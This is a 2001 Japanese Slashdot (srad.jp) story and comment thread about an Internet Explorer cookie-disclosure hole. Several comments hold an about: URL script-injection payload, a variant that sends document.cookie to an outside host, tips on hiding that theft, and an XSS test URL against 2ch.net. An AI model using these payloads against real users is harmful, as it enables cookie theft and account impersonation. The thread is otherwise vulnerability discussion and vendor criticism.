今度はCookieがらみ。IEのセキュリティーホール

今度はCookieがらみ。IEのセキュリティーホール 30

ストーリー by wakatono 2001年11月09日 17時43分
またか… 部門より

lovely_kitayama 曰く，"ウンザリするほどセキュリティーホールを吐き出している IEで、こんどはこちらにあるように、cookie がらみのセキュリティーホールが発見された。ついこの間もcookie関連の話題があったばかりなので、これでますますIEの信用が無くなることであろう…って、もうそんなもの何処にも無いですね。"

なんかまたも立て続けに…何が憑いてるんだろう…って、バグが憑いてる…

この議論は賞味期限が切れたので、アーカイブ化されています。新たにコメントを付けることはできません。

記事ページを表示すべてのコメント取得

検索30コメント Log In/Create an Account

関連リンク (スコア:3, 参考になる)

by k3c (4386) on 2001年11月09日 18時15分 (#36984) ホームページ日記
いくつか関連リンクを提示しておきます。
- 日経バイトの記事にもありましたがMicrosoft Security Bulletin MS01-055
- BUGTRAQの記事
- セキュリティホールmemo MLの関連記事
パッチが出る前にBUGTRAQへの投稿があったので慌てて公開した、って感じですかね＜Microsoft。
- 回避方法 (スコア:3, 参考になる)
  
  by k3c (4386) on 2001年11月10日 0時49分 (#37078) ホームページ日記
  
  セキュリティホールmemo MLで、about:～を「制限付きサイト」ゾーンに登録してしまう方法が紹介されていました（[memo:1866]）。ご参考まで。
  
  シェア
  
  親コメント
- これやってみよう！ (スコア:2)
  
  by deleted user (1544) on 2001年11月09日 18時29分 (#36986) ホームページ日記
  
  上記の bugtraq の通りに書いてみました。
  JScriptオンにして、M$IEで
  about://srad.jp/<script%20language=JavaScript>alert(document.coo...
  を実行してみてください。見事に /. のクッキーが出ます。。。。
  
  シェア
  
  親コメント
  - Re:これやってみよう！ (スコア:2)
    
    by deleted user (1544) on 2001年11月09日 18時37分 (#36989) ホームページ日記
    
    で、これをどうやって悪用するんだろう?
    
    シェア
    
    親コメント
    - Re:これやってみよう！ (スコア:4, 参考になる)
      
      by seldon (5637) on 2001年11月09日 19時14分 (#37004)
      
      この例文だと、alartで単にダイヤログ出すようになってるだけだけど、alartの代わりにlocation.href(%22http://dokkano.site/?%22+document.cookie) とかしといて、そのdokkano.siteでは別のページへ直ちに移るようにしておけば、アクセスログにユーザのcookieの情報を残す事ができます。
      太い帯域で繋がってるレスポンスの速いサーバを使えば、見つかりにくいかもしれないし、ポップアップ広告みたいなアドレス欄非表示のウィンドだとまずわかんないでしょうね。
      
      シェア
      
      親コメント
  - Re:これやってみよう！ (スコア:2)
    
    by sato4 (4413) on 2001年11月09日 18時46分 (#36995) 日記
    
    良くわからないのですが、ブラウザがブラウザの保存しているcookieを表示することで何かセキュリティホールになるのでしょうか？
    
    これと合わせてブラウザがcookieを第三者に渡してしまう仕組みがあるということですかね？
    クリップボードとか？
    
    シェア
    
    親コメント
    - Re:これやってみよう！ (スコア:3, 参考になる)
      
      by Dot.Zeile (1169) on 2001年11月09日 19時14分 (#37005) 日記
      
      保持されているcookieの内容がJScriptの変数に読み込める、ということは、それをformのelementに代入できるということです。JScriptはプログラム的にsubmitする能力を持っていますし、appletを貼ればLiveConnectでそちらに値を読み込むこともできますから。
      
      シェア
      
      親コメント
  - Re:これやってみよう！ (スコア:2)
    
    by anakata (5746) on 2001年11月09日 19時39分 (#37012)
    
    http://www.solutions.fi/iebug/
    のデモも試してみてください。
    見事に任意のドメインのクッキーを相手のページ内に表示させることが出来ます。
    うまく使うと、cookieベースでログイン状態を保持している他のサイトのログイン状態を収集して、
    簡単になりすましが出来そうですね。
    
    シェア
    
    親コメント
    - Re:これやってみよう！ (スコア:2)
      
      by deleted user (1544) on 2001年11月10日 14時05分 (#37179) ホームページ日記
      
      PATH=/ 以外は指定しないと拾えないのかなあ。
      盗まれにくいクッキーは PATH= を工夫するべきか。
      
      シェア
      
      親コメント
  - 2chもCookie漏らす (スコア:0)
    
    by Anonymous Coward
    
    ２ちゃんねるにも、クロスサイトスクリプティング脆弱性がありますね。こちらでテスト。
    http://pc.2ch.net/../<SCRIPT>alert('hello')</SCRIPT>
    元ネタ：http://pc.2ch.net/test/read.cgi/sec/1004160822/
もうこうなると (スコア:2, おもしろおかしい)

by namatias (4000) on 2001年11月09日 18時30分 (#36987) 日記

有名だからクラックされるのか、探せばありそうだからクラックされるのか、どっちが正しいのかわけわからん。

どっちもか、、、
- Re:もうこうなると (スコア:2, 参考になる)
  
  by Anonymous Coward on 2001年11月09日 19時05分 (#37000)
  
  シェアが大きいためただでさえ狙われやすいのに、OSに必ず付属していて普通は(一般には)削除できず、
  ファイル名と存在している場所が分かっているため、攻撃場所がはっきりしていること。
  
  任意のフォルダーにインストールできればいいのに。
  
  インストールが必要になればIEのインストールなんてしないのに。
  
  シェア
  
  親コメント
- Re:もうこうなると (スコア:1)
  
  by junya (192) on 2001年11月09日 18時37分 (#36990)
  
  穿った見方としては「マイクロソフトだからクラックされる」というのも。
  
  シェア
  
  親コメント
  - Re:もうこうなると (スコア:1)
    
    by alp (1425) on 2001年11月10日 0時45分 (#37076) ホームページ日記
    
    そーゆー人達の期待を絶対に裏切らない、というのもマイクロソフトが愛される理由の一つでしょう。
    
    ＃違うか ;^_^)
    
    シェア
    
    親コメント
- - Re:もうこうなると (スコア:2)
    
    by optimized (4229) on 2001年11月09日 21時08分 (#37026)
    
    >この話の何がどうクラックなの？
    
    心底同意。良く言ってただのバグ、普通に表現して仕様、MSのアイデンティティですね。
    
    根本の設計思想が間違えてますから、表象的な階層での後追い対応に終始して、ただでさえ建て増し旅館方式の構造が、まさに迷宮になってしまい、最終的には作った本人もわけわからんという状態になるのでしょう。
    
    痛烈に皮肉を言えば、ＭＳ社員は「紳士」であって、コンピュータを使う人も「紳士」であることを想定し、不正アクセスは違法です！　と言って「紳士協定」が成立することを当然だと思っているのでしょう。Windowsネットワークも、あれはかなり「紳士協定」を前提にしてる部分が多いですし、そういう会社なのでしょう。
    
    ＃ただの無知、技術力欠如、というお話は聞き飽き
    ＃ましたネ
    
    --
    optimized for /.
    
    シェア
    
    親コメント
つーかまだIE使っている人って多いんですね (スコア:2, おもしろおかしい)

by Anonymous Coward on 2001年11月09日 21時25分 (#37028)

IEユーザが減れば、MSも喜ぶんじゃないだろうか？ :-)
- Re:つーかまだIE使っている人って多いんですね (スコア:1)
  
  by RED COMET (3816) on 2001年11月10日 1時21分 (#37087) ホームページ
  
  連日、nimda発(多分)の添付ファイル付きMailを５０通も受け取る僕も狂喜乱舞！
  つーか、粗悪なSOFTをばらまくM$を訴えられないのか？
  使用許諾を受けたのは先方であって・・・自分もそうか。
  
  --
  AMIGA4000T(60/50)使い
  
  シェア
  
  親コメント
無責任 (スコア:2)

by shimpei (1499) on 2001年11月10日 16時43分 (#37197)

微軟公司のsecurity advisoryより。
Why isn’t there a patch available for this issue?
The person who discovered this vulnerability has chosen to handle it irresponsibly , and has deliberately made this issue public only a few days after reporting it to Microsoft. It is simply not possible to build, test and release a patch within this timeframe and still meet reasonable quality standards.
自分が自分で作ったバグを自分で直せない事を棚にあげて、よく人様を無責任呼ばわり出来たもんだと、毎回ながら感心しちゃいます。自分が悪かったとは決して言えない体質なのね。
バグが無くならない (スコア:1, すばらしい洞察)

by Anonymous Coward on 2001年11月10日 16時49分 (#37198)

今回の件で救いようがないのは、IE5.5とIE6での問題だと言うこと（IE5.01では再現しない）。
要は何らかの機能追加により巨大な穴が新しく発生しているわけだから、現状の設計・開発理念を改めない限り、

「常に巨大な穴が生成され続ける」

と言う愉快げな循環に陥っているわけです。
- Re:バグが無くならない (スコア:2)
  
  by char (1245) on 2001年11月11日 14時47分 (#37359) ホームページ日記
  
  今回の件で救いようがないのは、IE5.5とIE6での問題だと言うこと（IE5.01では再現しない）。
  そうであるにもかかわらず、「Windows 重要な更新の通知」はIE 5.5 SP2へのアップグレードを勧めてやまない。
  CSSへの対応状況などを考えても、IEは5.01 SP2から変更したくないのだ。
  
  --
  char *A;
  モータースポーツ部 [slashdot.jp]
  
  シェア
  
  親コメント
憑いているのは・・・ (スコア:0, オフトピック)

by non (2549) on 2001年11月09日 19時06分 (#37001) 日記

きっと「ちびげＯつ」君

オフトピでした。

--
-- non --
- 管理者の最終回(Re:憑いているのは・・・) (スコア:1)
  
  by isi (4853) on 2001年11月09日 19時11分 (#37002) 日記
  
  ちびゲ○ツ……　ボクはもう疲れたよ……
  
  シェア
  
  親コメント
  - 最終回 (スコア:0)
    
    by Anonymous Coward
    
    「ちびゲイツ」は今週で最終回です。
    
    来週からは新番組「チビゲ」がはじまります。
    お楽しみに！
    - Re:最終回 (スコア:0)
      
      by Anonymous Coward
      
      チビゲはチビゲ以上のなにものでもなさげ -- チビゲ研究家
      - 免責事項 (スコア:0)
        
        by Anonymous Coward
        
        チビゲはチビゲ以上のなにものでもなさげ -- チビゲ研究家
        
        なかなかいいですね。
        Microsoftサイトのあらゆるところでみかける鬱陶しい免責事項の記述の代わりに、この一文を書いておけばいいのではないでしょうか。
IE4の頃から… (スコア:0)

by Anonymous Coward on 2001年11月10日 2時12分 (#37098)

アドレスの欄にabout:～でHTML書いちゃうと、HTMLの書いたとおりに表示されるバグは知ってたのだけど、こういう使い方があったとは。
about:のバグは結構知ってた人は多かったと思うのだが、どうして今まで指摘されなかったのだろう?
単に私が既に指摘されてたのを知らないだけなのだろうか?
- Re:IE4の頃から… (スコア:0)
  
  by Anonymous Coward
  
  悪用方法が判明するまで直さないというMSの態度に問題があるということがはっきりしましたね。最初からさっさと直してりゃこんなことにはならなかったろうに。
- Re:IE4の頃から… (スコア:0)
  
  by Anonymous Coward
  
  > about:～でHTML書いちゃうと、HTMLの書いたとおりに表示される
  
  これは「機能」でしょう。泥棒に鍵を与える設計ミスなんですが。
  
  Windows全体を箱庭モデルで設計し直す必要がありますな。
  
  名付けて(以下自粛)
またかぁ (スコア:0)

by Anonymous Coward on 2001年11月10日 21時46分 (#37251)

毎度おなじみ。もう聞き飽きちゃった。なんかもっと面白いネタないのかね？

より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。

今度はCookieがらみ。IEのセキュリティーホール 30

今度はCookieがらみ。IEのセキュリティーホール More ログイン

関連リンク (スコア:3, 参考になる)

回避方法 (スコア:3, 参考になる)

これやってみよう！ (スコア:2)

Re:これやってみよう！ (スコア:2)

Re:これやってみよう！ (スコア:4, 参考になる)

Re:これやってみよう！ (スコア:2)

Re:これやってみよう！ (スコア:3, 参考になる)

Re:これやってみよう！ (スコア:2)

Re:これやってみよう！ (スコア:2)

2chもCookie漏らす (スコア:0)

もうこうなると (スコア:2, おもしろおかしい)

Re:もうこうなると (スコア:2, 参考になる)

Re:もうこうなると (スコア:1)

Re:もうこうなると (スコア:1)

Re:もうこうなると (スコア:2)

つーかまだIE使っている人って多いんですね (スコア:2, おもしろおかしい)

Re:つーかまだIE使っている人って多いんですね (スコア:1)

無責任 (スコア:2)

バグが無くならない (スコア:1, すばらしい洞察)

Re:バグが無くならない (スコア:2)

憑いているのは・・・ (スコア:0, オフトピック)

管理者の最終回(Re:憑いているのは・・・) (スコア:1)

最終回 (スコア:0)

Re:最終回 (スコア:0)

免責事項 (スコア:0)

IE4の頃から… (スコア:0)

Re:IE4の頃から… (スコア:0)

Re:IE4の頃から… (スコア:0)

またかぁ (スコア:0)

スラド